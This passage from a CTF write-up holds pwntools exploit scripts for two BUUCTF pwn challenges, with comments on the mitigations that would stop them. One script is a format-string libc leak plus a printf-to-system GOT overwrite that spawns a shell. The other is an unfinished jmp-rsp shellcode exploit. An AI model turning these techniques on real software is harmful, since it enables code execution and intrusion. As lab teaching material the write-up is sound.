axb_2019_fmt64(格式化字符串泄露信息+修改GOT表)
本题原理并不复杂,直接贴Exp吧:
# Exploit script for the axb_2019_fmt64 challenge (pwntools, Python 2 syntax:
# note the bare `print` statement and str/bytes concatenation below).
# Vulnerability class exercised: user input reaches printf as the format
# string, so positional conversions both read memory (%s) and write it (%n).
# Any one of these would break this path: a constant format string
# (printf("%s", buf)), -Werror=format-security at build time, _FORTIFY_SOURCE=2
# (glibc refuses %n when the format string lives in writable memory), or
# Full RELRO, which makes the GOT read-only once the program has started.
from pwn import *

# Live challenge instance; the commented-out process() line is the local
# alternative. Host, port and paths are the page's own values.
r = remote("node3.buuoj.cn", 28352)
#r = process("./axb_2019_fmt64")
context.log_level = 'debug'

# Optional debugger attach. The breakpoint and the examined address are the
# author's and only make sense for this particular binary.
DEBUG = 0
if DEBUG:
    gdb.attach(r,
'''
b *0x400957
x/gx 0x601030
c
''')

elf = ELF("./axb_2019_fmt64")
libc = ELF('./libc/libc-2.23.so')

# GOT slots are used as fixed constants, which presumably means a non-PIE
# binary without Full RELRO (writable GOT) — confirm with checksec.
read_got = elf.got['read']
printf_got = elf.got['printf']
success("read_got:" + hex(read_got))

# Stage 1, leak: 8 bytes of format ('%9$s' padded with 'a') followed by the
# GOT address of read. The author's positional index 9 is where that pointer
# sits when printf walks its arguments, so %s prints the bytes it points to,
# i.e. the resolved libc address of read.
r.recvuntil("Please tell me:")
payload = '%9$s'.ljust(8, 'a') + p64(read_got)
r.sendline(payload)
r.recvuntil("Repeater:")
# The leak is read up to the first 0x7f byte (high byte of a userland libc
# address) and zero-padded to 8 bytes before unpacking.
read_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
# libc base follows from the leaked symbol and the matching libc build (2.23).
libc.address = read_addr - libc.symbols['read']
system = libc.symbols['system']
printf = libc.sym['printf']
success("read:" + hex(read_addr))
success("system:" + hex(system))
success("printf:"+hex(printf))

# Stage 2, GOT overwrite: printf's GOT entry is redirected to system. Only the
# low three bytes are written — the author relies on the upper bytes already
# matching since both symbols live in the same libc mapping — as one byte
# (%hhn via argument 12 -> printf_got+2) and two bytes (%hn via argument 13
# -> printf_got). The %Nc paddings set printf's running character count;
# num1 is reduced by len("Repeater:"), presumably because that prefix is part
# of what printf counts, and num2 is relative to the count after the first
# write. This only works when num2 is non-negative; nothing here checks that.
r.recvuntil("Please tell me:")
num1 = ((system>>16) & 0xFF) - len("Repeater:")
num2 = (system & 0xFFFF) - ((system>>16) & 0xFF)
payload = '%' + str(num1) + 'c%12$hhn%'
payload += str(num2) + 'c%13$hn'
# Padded to 32 bytes so the two target pointers land at positional arguments
# 12 and 13, consistent with the offset used in stage 1 (buffer start = arg 8).
payload = payload.ljust(32, 'a') + p64(printf_got+2) + p64(printf_got)
print payload
r.sendline(payload)
r.recv()
# With printf's GOT entry now pointing at system, the next line of input is
# handed to system; the leading ';' presumably separates the command from the
# prefix the program prepends to the buffer.
r.sendline(';/bin/sh')
r.interactive()
[极客大挑战 2019]Not Bad(jmp rsp,写shellcode)
居然没有保护,然而需要写一个open、read、write的shellcode来执行。
# Exploit script for [极客大挑战 2019]Not Bad (pwntools). Per the page the
# binary ships without protections and a `jmp rsp` gadget is used to run
# injected shellcode; the payload construction continues past this excerpt.
# An executable stack is what makes this approach viable — NX alone (a
# non-executable stack) would stop a jmp-rsp-into-shellcode chain, and PIE
# would invalidate the fixed gadget address used below.
from pwn import *

# Live challenge instance; the commented-out process() line is the local
# alternative. Host, port and paths are the page's own values.
r = remote("node3.buuoj.cn", 29344)
#r = process("./bad")

# Optional debugger attach; the breakpoint is the author's and specific to
# this binary.
DEBUG = 0
if DEBUG:
    gdb.attach(r,
'''
b *0x400A4A
c
''')

# Architecture/OS must be set before asm()/shellcraft helpers are used.
context(arch = 'amd64', os = 'linux', log_level = 'debug')
elf = ELF("./bad")
libc = ELF('./libc/libc-2.27.so')

# Address of the jmp rsp gadget inside the binary (author's value; a fixed
# address implies a non-PIE build).
jmp_rsp = 0x400A01
# Author's chosen address named mmap; how it is used is not visible here.
mmap = 0x123000
r.recvuntil("Easy shellcode, have fun!\n")
payload